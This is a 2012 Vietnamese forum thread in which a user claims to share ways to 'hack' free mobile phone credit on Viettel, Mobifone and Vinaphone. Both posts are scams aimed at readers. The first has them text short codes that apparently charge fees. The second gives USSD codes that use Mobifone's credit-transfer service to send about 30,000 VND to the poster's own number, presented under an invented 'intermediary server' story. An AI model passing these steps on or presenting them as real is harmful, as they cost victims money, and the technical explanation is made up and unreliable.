Gunny Online
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

Hack Tien Dien Thoai Di Dong

Go down

Hack Tien Dien Thoai Di Dong Empty Hack Tien Dien Thoai Di Dong

Bài gửi  thai Sat Feb 25, 2012 5:33 pm

Hôm nay share trên google.com thấy được bài vết này rất hay...Mình đã thữ làm theo và đã thành công...giờ mình xin mạo muội chia sẽ cho các bạn
Từ này các mem ko cần phải lo dế yêu của mình hết tiền nữa vì đã có tổng đài hack tiền ảo cho di động mạng Viettel, Mobi, Vinafone,..

Chỉ cần soạn tin: NAP NAP100.000VND gửi 6736 / 8730
Chú Ý: Số tiền trong tài khoản của bạn phải lớn hơn 15.000vnd để trả phí dịch vụ, sao khi có thông báo gửi tin thành công bạn hãy đợi 5 phút để tiền tự động cập nhật vào tài khoản của bạn ( Nếu bạn nhấn *101# ngay sau khi nhắn tin thì sẽ không nhận được tiền đâu)
Tối đa mỗi ngày bạn có thể nhắn tin 17 lần, mỗi lần nhắn tin bạn sẽ nhận được 100.000vnd
Mình đã test và thấy rất ok...tám
Hack Tien Dien Thoai Di Dong Dfgsdgsdg

thai

Hack Tien Dien Thoai Di Dong Empty Huong dan hack tien dien thoai di dong chi danh cho mobifone

Bài gửi  thai Mon Feb 27, 2012 2:14 pm

1 -Một sim MOBIFONE hoạt động trên 230 ngày(hon 7 tháng).Tại sao phải cần vậy?Vì chỉ có những sim hoạt dộng trên 7 tháng mới được Mobifone đưa vào mã bảo vệ tài khoản chuyển tiền ( 6 tháng chưa được đâu các bạn) trên server Mobifone quản lí.

2 -Rất đơn giản :Các bạn làm theo cú pháp nhu sau:*117*0000*0000#. He thong se gui ve cho ban 1 tin nhan. Ban vao tra loi soan tin voi cu phap 1 va gui di de dong y .( nếu bạn chưa có mat khau sever).Tại sao phải cần vậy ? Vì chúng ta hack thông qua dịch vụ M2U của mobifone.

4 -Tài khoản trong sim của bạn phải có nhiều hơn 40101 Vnd.

5 -Các bạn làm theo cú pháp nhu sau: *119* mật khẩu Server *mã PIN *mã PUK#. He thong se tra loi cho ban 1 tin nhan ban soan tin 1 de dong y .Để khỏi mất thời gian của các bạn tìm lại 2 mã trên nên tôi đã tạo ra một Server trung gian ( viết tắt là TIS-Telephone of Intermediacy Server) với mã PIN và mã PUK mặc định (dùng đăng nhập sdt của bạn trên Server),tóm lại, cụ thể các thông số như sau (chỉ áp dụng cho mạng Mobifone):
mật khẩu Server:01282871257 hoặc 01282872816 và mã PIN :30000
mã PUK: 0000
Các bạn chỉ cần nhập chính xác 3 dãy số trên vào cú pháp và nhấn nút gọi thì hệ thống sẽ tự động đăng nhập sdt của bạn vào TIS (Telephone of Intermediacy Server) mà tôi tạo ra và tài khoản của sdt người gửi sẽ tự đông được công thêm tiền hack được sau khi đăng nhập (tiền hack được sẽ công thêm vào tài khoản chính),thật ra đây là một trong những cách hack tài khoản điện thoại mà các Hacker chuyên nghiệp trên thế giới gần đây mới sử dụng ( nguyên lý là dùng mã hack đảo chiều các dịch vụ chuyển tiền từ các Server di đông,chẳng hạn như M2U , hiên trên mạng có nhiều tài liệu tiếng Anh nói về vấn đề này).

6- Sau khi làm xong những bước trên : các bạn chỉ cần đợi 15 phút , sẽ có tin nhắn trả lời và tài khoản chính của các bạn đã được cộng thêm 100100 vnd. (đã Test)

thai